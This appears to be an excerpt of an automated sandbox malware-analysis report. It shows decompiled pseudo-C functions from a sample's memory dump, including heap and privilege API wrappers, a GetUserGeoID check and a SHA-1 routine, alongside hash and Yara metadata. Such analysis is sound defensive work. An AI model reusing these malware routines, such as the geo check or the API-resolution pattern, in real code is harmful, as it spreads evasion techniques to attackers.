                                                                                                                                                                                                                                                                                                                            				_t3 = _a4 + 0xa9c; // 0xa9c
                                                                                                                                                                                                                                                                                                                            				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                                                                                                                                                                                                                                                                            				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                                            				return _t10;
                                                                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E870
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a5ada8523d69dc06aed859862b2fcb1f70b55fcd9bee19eb83eda75f01fde0a3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0E012B2200208ABCB14EF89DC45EA73BACAF88664F018059BA085B242C630F914CAB1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 130 4100c3-4100e7 call 4195b3 133 4100e9-4100ea 130->133 134 4100eb-4100fc GetUserGeoID 130->134
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                                            			E004100C3(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                                            				intOrPtr* _t7;
                                                                                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                                                                                                                                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                                                                                                                                                                            					_t8 =  *_t7(0x10); // executed
                                                                                                                                                                                                                                                                                                                            					return 0 | _t8 == 0x000000f1;
                                                                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: User
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 765557111-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2a2f4bf2d1b5abfca1b0b9b1d707145b6cc185a4d9725ba336fd9684e65462f9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a2f4bf2d1b5abfca1b0b9b1d707145b6cc185a4d9725ba336fd9684e65462f9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 138 41e883-41e8b4 call 41f1e3 RtlFreeHeap
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E883(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t3 = _a4 + 0xaa0; // 0xaa0
                                                                                                                                                                                                                                                                                                                            				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                                                                                                                                                                                                                                                                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                                            				return _t10;
                                                                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,7BE2EBFA,00000000,?), ref: 0041E8B0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6d67904cf882d6269ddcbd82a13a5946b1ec36ad0a690608dd986dc7147b56d6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78E012B1200208ABCB14EF89DC49EA73BACAF88754F018059BA095B282C630E914CAB1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 141 41e9e3-41ea17 call 41f1e3 LookupPrivilegeValueW
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E9E3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				E0041F1E3( *((intOrPtr*)(_a4 + 0x188)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x188)), 0, 0x46);
                                                                                                                                                                                                                                                                                                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                                            				return _t10;
                                                                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                                                                            0x0041e9fd
                                                                                                                                                                                                                                                                                                                            0x0041ea13
                                                                                                                                                                                                                                                                                                                            0x0041ea17

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA13
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 147 41e8c3-41e8ef call 41f1e3 ExitProcess
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E8C3(intOrPtr _a4, int _a8) {
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t5 = _a4;
                                                                                                                                                                                                                                                                                                                            				E0041F1E3( *((intOrPtr*)(_a4 + 0x9c4)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x9c4)), 0, 0x36);
                                                                                                                                                                                                                                                                                                                            				ExitProcess(_a8);
                                                                                                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                                                                                                            0x0041e8c6
                                                                                                                                                                                                                                                                                                                            0x0041e8dd
                                                                                                                                                                                                                                                                                                                            0x0041e8eb

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8EB
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 150 126967a-126967f 151 1269681-1269688 150->151 152 126968f-1269696 LdrInitializeThunk 150->152
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                                                                                                                                                                                                            			E004017E8(signed int* __eax, signed int __edi, void* _a8, void* _a12, void* _a16) {
                                                                                                                                                                                                                                                                                                                            				void* _v0;
                                                                                                                                                                                                                                                                                                                            				void* _v4;
                                                                                                                                                                                                                                                                                                                            				void* _v31;
                                                                                                                                                                                                                                                                                                                            				void* _v33;
                                                                                                                                                                                                                                                                                                                            				void* _v50;
                                                                                                                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                                                                            				void* _v60;
                                                                                                                                                                                                                                                                                                                            				signed int* _t101;
                                                                                                                                                                                                                                                                                                                            				signed int _t159;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t101 = __eax;
                                                                                                                                                                                                                                                                                                                            				_t159 = __edi |  *__eax;
                                                                                                                                                                                                                                                                                                                            				asm("wait");
                                                                                                                                                                                                                                                                                                                            				asm("loope 0x30");
                                                                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                                                                                                                            				if (_t159 > 0) goto L6;
                                                                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: :$iiir
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-729711732
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 88acf25604aca0846400fcb5dd9da8a5bde09d6b53cda05089879cfe50d5051d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3396d3952a082c7a223aa057ec80b2e371b309597ed4362a2d76cc37b3280a2b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88acf25604aca0846400fcb5dd9da8a5bde09d6b53cda05089879cfe50d5051d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2710231905B858BCB12DF78C4902EBFBF1FF5A300F14869ED4A96B352DA34A645CB64
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: :$iiir
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-729711732
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 29b69e3d5a72d39eee183096013ae9581a1259f9bb9298d0c0cb325f26b6e904
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f51f8778a33b7e77007c94bd14de880356edb4a6b3e4ad39a8436ba3b7a115d8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29b69e3d5a72d39eee183096013ae9581a1259f9bb9298d0c0cb325f26b6e904
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD711231905B858BCB12DF78C4D02EBFBF1EF5A300F14869ED4A96B352DA30A645CB64
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                                                            			E0040BFCD(void* __ebx, signed int __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                                            				intOrPtr* _t11;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				 *__ecx =  *__ecx << __ecx;
                                                                                                                                                                                                                                                                                                                            				asm("a16 inc esp");
                                                                                                                                                                                                                                                                                                                            				asm("jecxz 0x57");
                                                                                                                                                                                                                                                                                                                            				_t11 = _a4;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 0x14)) = 0;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 0x18)) = 0;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 0x5c)) = 0;
                                                                                                                                                                                                                                                                                                                            				 *_t11 = 0x67452301;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 4)) = 0xefcdab89;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 8)) = 0x98badcfe;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 0xc)) = 0x10325476;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 0x10)) = 0xc3d2e1f0;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 0x60)) = 0;
                                                                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t11 + 0x64)) = 0;
                                                                                                                                                                                                                                                                                                                            				return _t11;
                                                                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-3887548279
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                                                                                                                                                                            			E0040C013(signed int* _a4) {
                                                                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                                                                            				char _v304;
                                                                                                                                                                                                                                                                                                                            				signed char* _t277;
                                                                                                                                                                                                                                                                                                                            				signed int* _t278;
                                                                                                                                                                                                                                                                                                                            				signed int _t279;
                                                                                                                                                                                                                                                                                                                            				signed int _t285;
                                                                                                                                                                                                                                                                                                                            				signed int _t288;
                                                                                                                                                                                                                                                                                                                            				signed int _t292;
                                                                                                                                                                                                                                                                                                                            				signed int _t295;
                                                                                                                                                                                                                                                                                                                            				signed int _t299;
                                                                                                                                                                                                                                                                                                                            				signed int _t303;
                                                                                                                                                                                                                                                                                                                            				signed int _t305;
                                                                                                                                                                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                                                                                                                                                                            				signed int _t318;
                                                                                                                                                                                                                                                                                                                            				signed int _t320;
                                                                                                                                                                                                                                                                                                                            				signed int _t323;
                                                                                                                                                                                                                                                                                                                            				signed int _t325;
                                                                                                                                                                                                                                                                                                                            				signed int _t334;
                                                                                                                                                                                                                                                                                                                            				signed int _t340;
                                                                                                                                                                                                                                                                                                                            				signed int _t341;
                                                                                                                                                                                                                                                                                                                            				signed int _t346;
                                                                                                                                                                                                                                                                                                                            				signed int _t353;
                                                                                                                                                                                                                                                                                                                            				signed int _t357;
                                                                                                                                                                                                                                                                                                                            				signed int _t358;
                                                                                                                                                                                                                                                                                                                            				signed int _t362;
                                                                                                                                                                                                                                                                                                                            				signed int _t365;
                                                                                                                                                                                                                                                                                                                            				signed int _t369;
                                                                                                                                                                                                                                                                                                                            				signed int _t370;
                                                                                                                                                                                                                                                                                                                            				signed int _t399;
                                                                                                                                                                                                                                                                                                                            				signed int _t404;
                                                                                                                                                                                                                                                                                                                            				signed int _t410;
                                                                                                                                                                                                                                                                                                                            				signed int _t413;
                                                                                                                                                                                                                                                                                                                            				signed int _t420;
                                                                                                                                                                                                                                                                                                                            				signed int _t423;
                                                                                                                                                                                                                                                                                                                            				signed int _t432;
                                                                                                                                                                                                                                                                                                                            				signed int _t434;
                                                                                                                                                                                                                                                                                                                            				signed int _t437;
                                                                                                                                                                                                                                                                                                                            				signed int _t445;
                                                                                                                                                                                                                                                                                                                            				signed int _t459;
                                                                                                                                                                                                                                                                                                                            				signed int _t462;
                                                                                                                                                                                                                                                                                                                            				signed int _t463;
                                                                                                                                                                                                                                                                                                                            				signed int _t464;
                                                                                                                                                                                                                                                                                                                            				signed int _t470;
                                                                                                                                                                                                                                                                                                                            				signed int _t478;
                                                                                                                                                                                                                                                                                                                            				signed int _t479;
                                                                                                                                                                                                                                                                                                                            				signed int* _t480;
                                                                                                                                                                                                                                                                                                                            				signed int* _t481;
                                                                                                                                                                                                                                                                                                                            				signed int _t488;
                                                                                                                                                                                                                                                                                                                            				signed int _t491;
                                                                                                                                                                                                                                                                                                                            				signed int _t496;
                                                                                                                                                                                                                                                                                                                            				signed int _t499;
                                                                                                                                                                                                                                                                                                                            				signed int _t502;
                                                                                                                                                                                                                                                                                                                            				signed int _t505;
                                                                                                                                                                                                                                                                                                                            				signed int _t506;
                                                                                                                                                                                                                                                                                                                            				signed int _t510;
                                                                                                                                                                                                                                                                                                                            				signed int _t522;
                                                                                                                                                                                                                                                                                                                            				signed int _t525;
                                                                                                                                                                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                                                                                                                                                                            				void* _t536;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t481 = _a4;
                                                                                                                                                                                                                                                                                                                            				_t353 = 0;
                                                                                                                                                                                                                                                                                                                            				_t2 =  &(_t481[7]); // 0x45
                                                                                                                                                                                                                                                                                                                            				_t277 = _t2;
                                                                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                                                                            					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                                                                                                                                                                                                                                                                                            					_t353 = _t353 + 4;
                                                                                                                                                                                                                                                                                                                            					_t277 =  &(_t277[0x10]);
                                                                                                                                                                                                                                                                                                                            				} while (_t353 < 0x10);
                                                                                                                                                                                                                                                                                                                            				_t278 =  &_v304;
                                                                                                                                                                                                                                                                                                                            				_v8 = 0x10;
                                                                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                                                                            					_t399 =  *(_t278 - 0x18);
                                                                                                                                                                                                                                                                                                                            					_t459 =  *(_t278 - 0x14);
                                                                                                                                                                                                                                                                                                                            					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                                                                                                                                                                                                                                                                                                            					asm("rol ecx, 1");
                                                                                                                                                                                                                                                                                                                            					asm("rol ebx, 1");
                                                                                                                                                                                                                                                                                                                            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                                                                                                                                                                                                                                                                                            					_t278[8] = _t357;
                                                                                                                                                                                                                                                                                                                            					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                                                                                                                                                                                                                                                                            					_t278 =  &(_t278[4]);
                                                                                                                                                                                                                                                                                                                            					asm("rol ebx, 1");
                                                                                                                                                                                                                                                                                                                            					asm("rol edx, 1");
                                                                                                                                                                                                                                                                                                                            					_t46 =  &_v8;
                                                                                                                                                                                                                                                                                                                            					 *_t46 = _v8 - 1;
                                                                                                                                                                                                                                                                                                                            					_t278[6] = _t318 ^ _t399;
                                                                                                                                                                                                                                                                                                                            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                                                                                                                                                                                                                                                                                            				} while ( *_t46 != 0);
                                                                                                                                                                                                                                                                                                                            				_t320 =  *_t481;
                                                                                                                                                                                                                                                                                                                            				_t279 = _t481[1];
                                                                                                                                                                                                                                                                                                                            				_t358 = _t481[2];
                                                                                                                                                                                                                                                                                                                            				_t404 = _t481[3];
                                                                                                                                                                                                                                                                                                                            				_v12 = _t320;
                                                                                                                                                                                                                                                                                                                            				_v16 = _t481[4];
                                                                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                                                                            					asm("rol ebx, 0x5");
                                                                                                                                                                                                                                                                                                                            					_t462 = _v8;
                                                                                                                                                                                                                                                                                                                            					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                                                                                                                                                                                                                                                                            					_t323 = _v12;
                                                                                                                                                                                                                                                                                                                            					asm("ror eax, 0x2");
                                                                                                                                                                                                                                                                                                                            					_v16 = _t404;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t488;
                                                                                                                                                                                                                                                                                                                            					asm("rol esi, 0x5");
                                                                                                                                                                                                                                                                                                                            					_v8 = _t358;
                                                                                                                                                                                                                                                                                                                            					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                                                                                                                                                                                                                                                                            					_t491 = _t279;
                                                                                                                                                                                                                                                                                                                            					asm("ror ebx, 0x2");
                                                                                                                                                                                                                                                                                                                            					_v16 = _v8;
                                                                                                                                                                                                                                                                                                                            					_t362 = _v12;
                                                                                                                                                                                                                                                                                                                            					_v8 = _t323;
                                                                                                                                                                                                                                                                                                                            					_t325 = _v8;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t410;
                                                                                                                                                                                                                                                                                                                            					asm("rol edx, 0x5");
                                                                                                                                                                                                                                                                                                                            					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                                                                                                                                                                                                                                                                            					_t413 = _v12;
                                                                                                                                                                                                                                                                                                                            					_v16 = _t491;
                                                                                                                                                                                                                                                                                                                            					asm("ror ecx, 0x2");
                                                                                                                                                                                                                                                                                                                            					_v8 = _t362;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t285;
                                                                                                                                                                                                                                                                                                                            					asm("rol eax, 0x5");
                                                                                                                                                                                                                                                                                                                            					_v16 = _t325;
                                                                                                                                                                                                                                                                                                                            					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                                                                                                                                                                                                                                                                            					_t358 = _v12;
                                                                                                                                                                                                                                                                                                                            					_t288 = _v8;
                                                                                                                                                                                                                                                                                                                            					asm("ror edx, 0x2");
                                                                                                                                                                                                                                                                                                                            					_v8 = _t413;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t496;
                                                                                                                                                                                                                                                                                                                            					asm("rol esi, 0x5");
                                                                                                                                                                                                                                                                                                                            					_v16 = _t288;
                                                                                                                                                                                                                                                                                                                            					_t279 = _v12;
                                                                                                                                                                                                                                                                                                                            					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                                                                                                                                                                                                                                                                            					_t404 = _v8;
                                                                                                                                                                                                                                                                                                                            					asm("ror ecx, 0x2");
                                                                                                                                                                                                                                                                                                                            					_t463 = _t462 + 5;
                                                                                                                                                                                                                                                                                                                            					_t320 = _t499;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t320;
                                                                                                                                                                                                                                                                                                                            					_v8 = _t463;
